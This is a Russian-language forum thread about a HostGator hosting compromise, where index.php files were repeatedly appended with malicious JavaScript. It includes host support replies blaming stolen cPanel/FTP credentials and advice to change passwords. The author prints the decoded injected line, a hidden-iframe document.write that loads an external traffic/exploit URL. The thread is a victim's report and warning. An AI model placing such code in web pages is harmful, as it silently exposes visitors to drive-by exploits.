И снова про HostGator

И снова проблемы с эксплоитами на HostGator. Netcraft опубликовали статью об этом ещё в 2006-м (http://news.netcraft.com/archives/2006/09/22/hacked_hostgator_sites…ploit.html), но похоже, хостер проблему так и не устранил. А она состоит в том, что периодически ко всем файлам index.php на всех аккаунтах некоторых серверов в конце дописывается код на javascript, который открывает во фрейме сайты, загружающие эксплоиты для IE (Firefox при этом чаще всего виснет).

Проблема наблюдается не на всех серверах. На некоторых из наших аккаунтов я вообще никогда не наблюдал подобного, а на некоторых это постоянно. Техподдержка хостгатора мягко посылает в жопу: сначала говорит, что необходимо найти все скрипты с правами доступа 777 и поменять на 775 - и проблема исчезнет сама собой. Нифига, хоть 644 поставь - всё равно вредоносный код через время появляется. Из этого скорее всего следует, что код дописывает руткит, установленный на серверах хостера - а хостер этого категорически не хочет признавать, обвиняя во всём клиентов- мол, проблемы у вас, а не у нас.

Потом стали говорить про то, что нам необходимо обновить наше программное обеспечение на самих доменах, поскольку оно скорее всего устарело, и может содержать дыры в безопасности. Ну это полный абсурд, поскольку у нас используется разный софт, я ставлю всегда самые последние версии. Ну не могут же все скрипты, как опен-сорнсные, так и коммерческие, содержать одну и ту же дыру в безопасности?

В общем, гугл наши домены на взломанных серверах сразу занес в черный список, и при переходе с гугла сначала возникает предупреждение, что данный сайт замечен в распространении эксплоитов и троянов, поэтому вы переходите туда на свой страх и риск, и тд. Хорошая реклама для онлайн магазина, который принимает кредитные карточки непосредственно через мерчант (без 3-пати процессоров), не правда ли? И на главной странице при этом висит логотип HackerSafe.

В общем, хостер меня окончательно достал. Раньше они мне очень нравились, поскольку стоимость маленькое, аптайм действительно 99.9% и места/трафика много. Да и с партнёрской программы тоже платили регулярно - по $50 за клиента. Но к сожалению, хорошие времена прошли - придётся искать нового хостера, и переносить огромные объёмы данных. Поскольку я веб-разработчик, то у меня был опыт работы с более чем десятком хостеров, и этот был лучшим из них. Ха-ха, был...

Вот расшифрованный код того, что дописывается к индексным файлам (открываемые в ифрейме адреса разные):

Код:

window.status='Done';document.write('<iframe name=6e3e5071b57 src='http://alltraff.cn/traff.php?'+Math.round(Math.random()*103170)+'500349a1b87a' width=190 height=543 style='display: none'></iframe>')

В общем, выбирая хостера - будьте осторожны.

Последний раз редактировалось: alex_raven (29/11/07 в 00:41), всего редактировалось 1 раз

Оффтопик: Дешева рыбка - погана юшка. Как говорят в орандж кантри. по сабжу сочуствую, когда изнутри ставят такое гавно, бороться нереально - обычные меры бесполезны.

Да, и ещё забыл добавить: последние несколько месяцев CPanel практически не работает - либо вообще не открывается, либо открывается с очень большой задержкой. При этом вызвать из неё тот же phpMyAdmin вообще почти нереально - опять же, выдает таймаут в 4 случаях из 5. Приходится давить F5 и молиться.

HostGator отмазался :-) Оказывается, это не их проблема, а проблема CPanel (пароли были украдены именно оттуда). Все модификации файлов аккаунтов были выполнены через FTP. Также сообщают, что дыра была устранена и мы можем дышать спокойно. Чтож, посмотрим...

Цитата:

This was done through FTP. The issue in the article you provided has been long resolved and was not a Hostgator security hole but a CPanel one, hence why several CTOs from other companies were looking into the issue with our staff being at the forefront. Our servers have brute force protection installed and most of the attacks are a result of accessing the site from a location with a virus or Trojan installed. If you research the code given there is a Trojan that has been gathering username and password from infected computer for months and just recently started uploading hidden iframe scripts to the accounts they collected. There is no additional verification offered when the the correct user name and password is used for authentication. Here is the article that was posted the very next day that explained exploit was isolated to CPanel and not Hostgator. http://news.netcraft.com/archives/2006/09/23/hostgator_cpanel_secur…_hack.html

Так что, если у вас есть аккаунты на Гаторе, в любом случае могу порекомендовать как можно быстрее сменить к ним пароли.

значит на других хостингах с CPanel должна была бы быть такая же проблема.

Э, топикстартер, не пугай так. Хостгатор действительно лучший вариант виртуала.
У меня пока ничего плохого не было замечено, посмотрим, что дальше будет.

Согласен, слегка резко получилось, хотя в описании проблемы ничего не приукрасил. Но саппорт по крайней мере через несколько месяцев попыток выяснить в чём причина, наконец дал вразумительный ответ. Так что переносить свои сайты пока не буду, потому что действительно, такие ресурсы для виртуала не предлагает больше ни один хостер.